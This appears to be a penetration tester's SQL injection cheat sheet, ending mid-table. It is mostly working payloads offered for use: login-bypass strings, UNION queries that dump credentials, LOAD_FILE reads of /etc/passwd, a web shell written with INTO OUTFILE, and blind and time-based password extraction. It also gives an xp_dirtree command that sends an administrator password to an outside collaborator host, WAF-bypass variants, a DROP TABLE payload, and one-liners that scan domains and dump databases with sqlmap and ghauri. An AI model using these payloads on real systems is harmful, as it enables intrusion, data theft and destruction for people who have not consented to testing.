# SQL Injection [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) {% content-ref url="../protocols/mysql-3306" %} [mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306) {% endcontent-ref %} {% content-ref url="../protocols/mssql-1433" %} [mssql-1433](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mssql-1433) {% endcontent-ref %} {% content-ref url="../tools/sqlmap" %} [sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap) {% endcontent-ref %} ```php $searchInput = $_POST['findUser']; $query = "select * from logins where username like '%$searchInput'"; $result = $conn->query($query); ``` ```sql select * from logins where username like '%$searchInput' ``` payload ```php '%1'; DROP TABLE users;' ``` ```sql select * from logins where username like '%1'; DROP TABLE users;' ``` return ```php Error: near line 1: near "'": syntax error ```

Type of SQLi

## Cheatsheet {% embed url="" %} {% embed url="" %} ## One Liners {% embed url="" %} ``` $ waymore -i urls | tee urls-his $ cat urls-his | gf sqli |urless| anew sqli $ ghauri -m sqli --confirm --batch --level=3 -b ``` {% embed url="" %} install [urlfinder](https://github.com/projectdiscovery/urlfinder), [qsreplace](https://github.com/tomnomnom/qsreplace), [anew](https://github.com/tomnomnom/anew), [ghauri](https://github.com/r0oth3x49/ghauri), sqlmap #### SQLi All ``` urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;ghauri -m sqli.txt --random-agent --confirm --force-ssl --level=3 --dbs --dump --batch ``` #### Blind SQLi ``` urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;sqlmap -m sqli.txt --technique=BT --level=5 --risk=3 --tamper=space2comment,sleep2getlock,space2randomblank,between,randomcase,randomcomments,bluecoat,ifnull2ifisnull --batch --random-agent --no-cast --current-db --hostname ``` #### Time Based SQLi ``` urlfinder -d "example.com" -all | grep -aE '\.(php|asp|aspx|jsp|cfm)' | qsreplace "SQLI" | grep -a "SQLI" | anew > sqli.txt;sqlmap -m sqli.txt --technique=T --level=5 --risk=3 --tamper=space2comment,space2plus,space2randomblank,space2morehash,between,randomcase,charencode,symboliclogical --batch --random-agent --no-cast --time-sec=10 --current-db --count ``` ## SQLi Discovery | Payload | URL Encoded | | ------- | ----------- | | `'` | `%27` | | `"` | `%22` | | `#` | `%23` | | `;` | `%3B` | | `)` | `%29` | ### Recon {% embed url="" %} {% embed url="" %} ### Nmap ``` nmap --script http-sql-injection -p 80 http://example.com ``` ## Generic Payloads ``` ' '' ` `` , " "" / // \ \\ ; '-- ' or " -- or # ' OR '1 ' OR 1 -- - " OR "" = " '+OR+1=1-- ' OR 1=1-- " OR 1 = 1 -- - ' OR '' = ' '=' 'LIKE' '=0--+ OR 1=1 ' OR 'x'='x ' AND id IS NULL; -- '''''''''''''UNION SELECT '2 %6c%75%33%6b%79%31%33' AND 1=CAST((SELECT version()) AS int) -- # Numeric AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2 1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+ 1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+ 1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 -- -1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename -- -1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@ 1 AND (SELECT * FROM Users) = 1 ' AND MID(VERSION(),1,1) = '5'; ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- # Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'-- ====================================== # Hash comment /* C-style comment -- - SQL comment ;%00 Nullbyte ` Backtick %00 /*…*/ + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator @ variable local variable @@ variable global variable ``` ### Polyglot ``` &1/*'/*"/**/||1#\ and-1/*'/*"/**/||1--+\ ``` ## Authentication Bypass ```sql SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd'; ``` ```sql admin' or '1'='1 ``` ```sql SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something'; ``` Username field: {% hint style="info" %} *Use a known username* {% endhint %} ``` administrator'-- ``` ``` ' OORR 1<2 # admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* ' and 'one'='one ' group by password having 1=1-- ' group by userid having 1=1-- ' group by username having 1=1-- like '%' ' or uid like '% ' or uname like '% ' or userid like '% ' or user like '% ' or username like '% ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '% " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or 1=1-- or true-- " or true-- ' or true-- ")or true-- ') or true-- ' or 'x'='x ) or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ``` Password field: ``` ' or ''=' ') or true— ') or ('')=(' ') or 1— ') or ('x')=(' " or true— " or ""=" " or 1— " or "x"=" ") or true— ") or ("")=(" ") or 1— ") or ("x")=(" ')) or true— ')) or ((''))=((' ')) or 1— ``` ### Fuzzing {% hint style="success" %} *Start with "*[*Generic Payload*](#generic-payloads)*" List* {% endhint %} {% content-ref url="fuzzing" %} [fuzzing](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/fuzzing) {% endcontent-ref %} {% embed url="" %}
## Comments We can use two types of line comments with MySQL `--` and `#`, in addition to an in-line comment `/**/` ## Auth Bypass with comments ``` admin'-- ``` ```sql SELECT * FROM logins WHERE username='admin'-- ' AND password = 'something'; ```
{% hint style="info" %} Put spaces after -- {% endhint %} ``` admin')-- ``` ```sql SELECT * FROM logins where (username='admin') ``` ``` user' or id=5 ) -- test ``` ``` SELECT * FROM logins WHERE (username='user' or id=5 ) -- test' AND id > 1) AND password = '******' ``` ## ID parameter ``` ?id=1' order by 1 --+ ?id=1' and "a"="a"--+ ?id=1' and database()="securtiy"--+ ?id=1' and substring(database(),1,1)="a"--+ ?id=1' and sleep(2) and "a"="a"--+ ?id=1' and sleep(2) and substring(database(),1,1)="a"--+ ``` ## Header Injection {% content-ref url="http-header-exploitation" %} [http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation) {% endcontent-ref %} ## Union ``` MariaDB [employees]> select * from employees limit 5; +--------+------------+------------+-------------+--------+------------+ | emp_no | birth_date | first_name | last_name | gender | hire_date | +--------+------------+------------+-------------+--------+------------+ | 10001 | 1953-09-02 | Georgi | Facello | M | 1986-06-26 | | 10002 | 1952-12-03 | Vivian | Billawala | F | 1986-12-11 | | 10003 | 1959-06-16 | Temple | Lukaszewicz | M | 1992-07-04 | | 10004 | 1956-11-06 | Masanao | Rahimi | M | 1986-12-16 | | 10005 | 1962-12-11 | Sanjay | Danlos | M | 1985-08-01 | +--------+------------+------------+-------------+--------+------------+ 5 rows in set (0.038 sec) MariaDB [employees]> select * from departments limit 5; +---------+------------------+ | dept_no | dept_name | +---------+------------------+ | d009 | Customer Service | | d005 | Development | | d002 | Finance | | d003 | Human Resources | | d001 | Marketing | +---------+------------------+ 5 rows in set (0.022 sec) MariaDB [employees]> select dept_no from departments union select emp_no from employees; ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Detect number of columns - Using ORDER BY {% embed url="" %} ```sql ' order by 1-- - ``` ```sql ' order by 2-- - ``` Until we reach a number that returns an error
This means that this table has exactly 4 columns . ```sql cn' UNION select 1,2,3,4-- - ```
While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection. {% hint style="info" %} We cannot place our injection at the beginning, or its output will not be printed. {% endhint %} ```sql cn' UNION select 1,@@version,3,4-- - ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Detect number of columns - using NULL ``` ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- etc. ``` ### Detect data type ``` ' UNION SELECT 'a',NULL,NULL,NULL-- ' UNION SELECT NULL,'a',NULL,NULL-- ' UNION SELECT NULL,NULL,'a',NULL-- ' UNION SELECT NULL,NULL,NULL,'a'-- ``` If the column data type is not compatible with string data, the injected query will cause a database error, such as: `Conversion failed when converting the varchar value 'a' to data type int.` ## Database Enumeration ### Fingerprinting {% embed url="" %} | Payload | When to Use | Expected Output | Wrong Output | | ------------------ | -------------------------------- | --------------------------------------------------- | --------------------------------------------------------- | | `SELECT @@version` | When we have full query output | MySQL Version 'i.e. `10.3.22-MariaDB-1ubuntu1`' | In MSSQL it returns MSSQL version. Error with other DBMS. | | `SELECT POW(1,1)` | When we only have numeric output | `1` | Error with other DBMS | | `SELECT SLEEP(5)` | Blind/No Output | Delays page response for 5 seconds and returns `0`. | Will not delay response with other DBMS | | Database type | Query | | ---------------- | ------------------------- | | Microsoft, MySQL | `SELECT @@version` | | Oracle | `SELECT * FROM v$version` | | PostgreSQL | `SELECT version()` | ``` ' UNION SELECT @@version-- ``` ### Database ``` mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA; +--------------------+ | SCHEMA_NAME | +--------------------+ | mysql | | information_schema | | performance_schema | | ilfreight | | dev | +--------------------+ 6 rows in set (0.01 sec) ``` ```sql cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - ``` Find the current database with the `SELECT database()` query ```sql cn' UNION select 1,database(),2,3-- - ``` ### Tables ```sql cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - ``` ``` SELECT * FROM information_schema.tables ``` ``` '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- ``` ### Columns ```sql cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - ``` ``` SELECT * FROM information_schema.columns WHERE table_name = 'Users' ``` ``` '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users'-- ``` ### Data {% hint style="info" %} Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed. {% endhint %} ```sql cn' UNION select 1, username, password, 4 from dev.credentials-- - ``` ``` '+UNION+SELECT+username,+password+FROM+users-- ``` Retrieve multiple values with a single column - Oracle ``` ' UNION SELECT username || '~' || password FROM users-- ``` ## Reading Files {% content-ref url="../protocols/mysql-3306" %} [mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306) {% endcontent-ref %} {% embed url="" %} ### DB User ```sql SELECT USER() SELECT CURRENT_USER() SELECT user from mysql.user ``` ```sql cn' UNION SELECT 1, user(), 3, 4-- - ``` ```sql cn' UNION SELECT 1, user, 3, 4 from mysql.user-- - ``` ### User Privileges ```sql SELECT super_priv FROM mysql.user ``` ```sql cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - ```
`Y` = yes, super\_priv If we had many users within the DBMS: ```sql cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - ``` Other privileges: ```sql cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - ``` ```sql cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - ``` `FILE` privilege is listed for our user, enabling us to read files and potentially even write files ### [LOAD\_FILE](#reading-writing-files) ```sql SELECT LOAD_FILE('/etc/passwd'); ``` {% hint style="info" %} Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it. {% endhint %} ```sql cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - ``` ```sql cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - ``` ``` # Load File http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user-- ## Bypass Filters Load File - "/etc/passwd":) load_file(0x2f6574632f706173737764) Load File - "/etc/passwd":) load_file(char(47,101,116,99,47,112,97,115,115,119,100)) # Into OutFile http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- ``` ## Write Files To be able to write files to the back-end server using a MySQL database, we require three things: 1. User with `FILE` privilege enabled 2. MySQL global `secure_file_priv` variable not enabled 3. Write access to the location we want to write to on the back-end server ```sql SHOW VARIABLES LIKE 'secure_file_priv'; ``` ```sql SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv" ``` ```sql cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - ``` `secure_file_priv` value is empty, meaning that we can read/write files to any location. ```shell-session SELECT * from users INTO OUTFILE '/tmp/credentials'; ``` ```sql SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt'; ``` {% hint style="info" %} Tip: Advanced file exports utilize the 'FROM\_BASE64("base64\_data")' function in order to be able to write long/advanced files, including binary data. {% endhint %} ### Web Shell {% hint style="info" %} Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use `load_file` to read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config`, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using [this wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or [this wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt). Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way. {% endhint %}
```sql cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - ```
{% content-ref url="../shells/web-shell" %} [web-shell](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/web-shell) {% endcontent-ref %} {% content-ref url="../shells/bind-and-reverse-shell" %} [bind-and-reverse-shell](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/bind-and-reverse-shell) {% endcontent-ref %} *** ## Resources {% embed url="" %} * * * * * * ## Payloads * - Also see: * * *** ## Blind SQL Injection - Conditional Response Confirm injection by adding quote ``` /search?query=' /search?query='' /search?query=''' ``` {% embed url="" %} {% embed url="" %} ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm ``` Return a valid message ⇒ 1th letter of the password is greater than m ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 't ``` Return an invalid message ⇒ 1th letter of the password is lower than t ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's ``` Return a valid message ⇒ 1th letter of the password is equal to s 2nd letter ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 2, 1) = 'e ``` 3d letter ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 3, 1) = 'c ``` And so on ``` TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§ ```
``` TrackingId=xyz' AND (SELECT SUBSTRING(password,1,2) FROM users WHERE username='administrator')='n§a§ ```
``` TrackingId=xyz' AND (SELECT SUBSTRING(password,1,3) FROM users WHERE username='administrator')='n5§a§ ``` Etc. ### Detect length ``` xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a ```
## Blind Time Based SQLi ``` 0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z 0'XOR(if (now()=sysdate(),sleep(5*1),0))XOR'Z if(now()=sysdate(), sleep(5),0) 'XOR(if(now()=sysdate(), sleep(5),0))XOR' 'XOR(if (now()=sysdate(), sleep(5*1),0))OR' ``` ## Time Based SQL Injection ``` '; IF (1=2) WAITFOR DELAY '0:0:10'-- '; IF (1=1) WAITFOR DELAY '0:0:10'-- ``` * The first of these inputs does not trigger a delay, because the condition `1=2` is false. * The second input triggers a delay of 10 seconds, because the condition `1=1` is true. Test one character at a time ``` '; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'-- ``` Retrieve password - PostgreSQL ``` || CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'),1,1) = 'a') THEN pg_sleep(5) ELSE pg_sleep(0) END -- ```
``` ' || CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'),1,2) = 'ea') THEN pg_sleep(5) ELSE pg_sleep(0) END -- ```
Etc. ``` XOR(if(now()=sysdate(),sleep(5),0))XOR ``` Increase Time Delay to confirm injection ``` '; WAITFOR DELAY '00:00:05' -- '; WAITFOR DELAY '00:00:10' -- '; WAITFOR DELAY '00:00:20' -- ``` {% embed url="" %} ``` +(select*from(select(sleep(20))))a)+ ``` ``` if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/ ``` ``` XOR(if(now()=sysdate(),sleep(7),0))XOR%23 'or sleep(7)--# 'or sleep(7)# 'or sleep(7)='# 'or sleep(7)='-- '/*F*/or/*F*/sleep(7)=' 'or sleep(7)--%23 'or sleep(7)%23 'or sleep(7);%00 or sleep(7)--+- or sleep(7)# '/*f*/or/*f*/sleep/*f*/(7)--# '/*f*/or/*f*/sleep/*f*/(7)# or sleep(7)%23 '/*f*/or/*f*/sleep/*f*/(7)--%23 '/*f*/or/*f*/sleep/*f*/(7)%23 '/*f*/or/*f*/sleep/*f*/(7);%00 or/*f*/sleep/*f*/(7)--+- or/*f*/sleep/*f*/(7)# 'XOR(if(now()=sysdate(),sleep(7),0))XOR' 'OR(if(now()=sysdate(),sleep(7),0))--# 'OR(if(now()=sysdate(),sleep(7),0))# or/*f*/sleep/*f*/(7)%23 'OR(if(now()=sysdate(),sleep(7),0))--%23 'OR(if(now()=sysdate(),sleep(7),0))%23 'OR(if(now()=sysdate(),sleep(7),0));%00 OR(if(now()=sysdate(),sleep(7),0))--+- OR(if(now()=sysdate(),sleep(7),0))# OR(if(now()=sysdate(),sleep(7),0))%23 'WAITFORDELAY'0:0:7';%00 'WAITFORDELAY'0:0:7'# 'WAITFORDELAY'0:0:7'%23 'WAITFORDELAY'0:0:7';%00 WAITFORDELAY'0:0:7'# WAITFORDELAY'0:0:7'%23 WAITFORDELAY'0:0:7'--+- 'WAITFORDELAY'0:0:7'--+- 'WAITFORDELAY'0:0:7'=' \/*F*/or/*f*/sleep(7)%23 '/*f*/OR/*f*/pg_sleep(7)# '/*f*/OR/*f*/pg_sleep(7)%23 '/*f*/OR/*f*/pg_sleep(7);%00 /*f*/OR/*f*/pg_sleep(70)--+- /*f*/OR/*f*/pg_sleep(70)# /*f*/OR/*f*/pg_sleep(70)%23 '/*f*/OR/*f*/pg_sleep(7)=';%00 \)/*F*/or/*f*/sleep(7)%23 \)/*F*/or/*f*/sleep(7)%23 %E2%84%A2%27/*F*/or/*f*/sleep(7)%23 %E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/sleep(7)--+- %E2%84%A2\)/*F*/or/*f*/sleep(7)--+- %E2%84%A2%27)/*F*/or/*f*/sleep(7)--+- %E2%84%A2'/*F*/or/*f*/sleep(7)=' %E2%84%A2')/*F*/or/*f*/sleep(7)=' 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X 0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z 'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X 'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z (SELECT(0)FROM(SELECT(SLEEP(6)))a) 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' 'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR' (SELECT * FROM (SELECT(SLEEP(5)))a) '%2b(select*from(select(sleep(5)))a)%2b' CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END ');(SELECT 4564 FROM PG_SLEEP(5))-- ["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"] DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar 1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK (select*from(select(sleep(20)))a) '%2b(select*from(select(sleep(0)))a)%2b' *'XOR(if(2=2,sleep(10),0))OR' -1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--// '+(select*from(select(if(1=1,sleep(20),false)))a)+'" 2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE) BENCHMARK(10000000,MD5(CHAR(116))) '%2bbenchmark(10000000%2csha1(1))%2b' '%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/ if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/ ``` {% embed url="" %} ``` `/?query="OR 1=1;--"&val1=ZGlkbnQgZXZlbiByZWFk&val2=aHR0cHM6Ly95b3V0dS5iZS9kUXc0dzlXZ1hjUQ%3D%3D&SLEEP(420)` ``` {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Nuclei Template ```yaml id: time-based-sqli info: name: Time-Based Blind SQL Injection author: github.com/rzizah severity: Critical description: Detects time-based blind SQL injection vulnerability http: - method: GET path: - "{{BaseURL}}" payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" fuzzing: - part: query type: replace mode: single fuzz: - "{{injection}}" stop-at-first-match: true matchers: - type: dsl dsl: - "status_code == 200" - "duration>=7 && duration <=16" condition: and ``` Source: ### WAF Bypass - Cloudflare ``` (select(0)from(select(sleep(10)))v) → 403 Forbidden Try: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) ``` ### Time Based SQLi in HTTP Headers {% embed url="" %} {% content-ref url="http-header-exploitation" %} [http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation) {% endcontent-ref %} ### CustomBSQLi - LostSec {% embed url="" %} ### OAT Blind SQLi ``` copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' ``` {% embed url="" %} MS SQL server ``` '; exec master..xp_dirtree '//random.burpcollaborator.net/a'-- ``` Data exfiltration ``` '; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.random.burpcollaborator.net/a"')-- ``` Oracle DB ``` '+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- ``` ## Numeric SQL Injection {% embed url="" %} ## Wildcard SQL injection - LIKE clause ``` http://www.example.com/userphoto.php?name=a% http://www.example.com/userphoto.php?name=b% http://www.example.com/userphoto.php?name=c% http://www.example.com/fruit.php?name=ap% ``` The server filtered the `%` wildcard, but the `_` character was permitted ``` http://www.example.com/admin/privado.php?sessionid=0_________ http://www.example.com/admin/privado.php?sessionid=1_________ http://www.example.com/admin/privado.php?sessionid=2_________ ``` {% embed url="" %} {% embed url="" %} ## Error-based SQL injection {% embed url="" %} ### Conditional Error ``` xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a ``` The second input causes a divide-by-zero erro 
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
Oracle DB ``` '||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ``` Password Length ``` '||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||' ```
Pasword value ``` '||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ```
``` '||(SELECT CASE WHEN SUBSTR(password,1,2)='da' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ```
Etc. ### Turn an otherwise blind SQL injection vulnerability into a visible one ``` CAST((SELECT example_column FROM example_table) AS int) ``` Attempting to convert this to an incompatible data type, such as an `int`, may cause an error similar to the following: `ERROR: invalid input syntax for type integer: "Example data"` ``` ' AND CAST((SELECT 1) AS int)-- ``` ``` # Username ' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)-- # Password ' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)-- ``` ## Fragmented SQL Injection - two endpoints {% embed url="" %} Let’s take a look at an instance where the single quote is blacklisted or escaped from the command. ``` $username ="' or 1=1 --";$password ="qwerty123456";// . . .$query = "SELECT * FROM users WHERE username='".$username."' AND password='".$password."'";select * from users where username='\' or 1=1 -- ' or password='qwerty123456'; ``` As you see in this example, because the single quote (‘) is escaped with a backslash, the payload does not work as intended by the hacker. ``` username: \password: or 1 # $query = select * from users where username='".$username."' and password='".$password."'";select * from users where username='\' or password=' or 1 # '; ``` The backslash neutralizes the following single quote. So the value for the *username* column will end with the single quote that comes right after *password*= (the end of the gray text). Doing so will eliminate the required password field from the command. Due to the or 1 command, the condition will always return ‘true’. The # (hash) will ignore the rest of the function, and you’ll be able to bypass the login control and login form. ## Email SQL injection {% content-ref url="email-injections" %} [email-injections](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/email-injections) {% endcontent-ref %} ## Bypass - WAF / Filters {% content-ref url="waf-bypass" %} [waf-bypass](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/waf-bypass) {% endcontent-ref %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} * ### SQLMap - All in one ``` `sqlmap -r req.txt --level=5 --risk=3 --dbms="mysql" --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor -p search` ``` {% content-ref url="../tools/sqlmap" %} [sqlmap](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/sqlmap) {% endcontent-ref %} ### Bypass combo ``` 'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+- ```
### Imperva gzip bypass {% embed url="" %} ### No Space (%20) - bypass using whitespace alternatives ```sql ?id=1%09and%091=1%09-- ?id=1%0Dand%0D1=1%0D-- ?id=1%0Cand%0C1=1%0C-- ?id=1%0Band%0B1=1%0B-- ?id=1%0Aand%0A1=1%0A-- ?id=1%A0and%A01=1%A0-- ``` ### No Whitespace - bypass using comments ```sql ?id=1/*comment*/and/**/1=1/**/-- ``` ### No Whitespace - bypass using parenthesis ```sql ?id=(1)and(1)=(1)-- ``` ### No Comma - bypass using OFFSET, FROM and JOIN ```sql LIMIT 0,1 -> LIMIT 1 OFFSET 0 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ``` ### Blacklist using keywords - bypass using uppercase/lowercase ```sql ?id=1 AND 1=1# ?id=1 AnD 1=1# ?id=1 aNd 1=1# ``` ### Blacklist using keywords case insensitive - bypass using an equivalent operator ```sql AND -> && OR -> || = -> LIKE,REGEXP, not < and not > > X -> not between 0 and X WHERE -> HAVING ``` ### Information\_schema.tables alternative ```sql select * from mysql.innodb_table_stats; +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+ | database_name | table_name | last_update | n_rows | 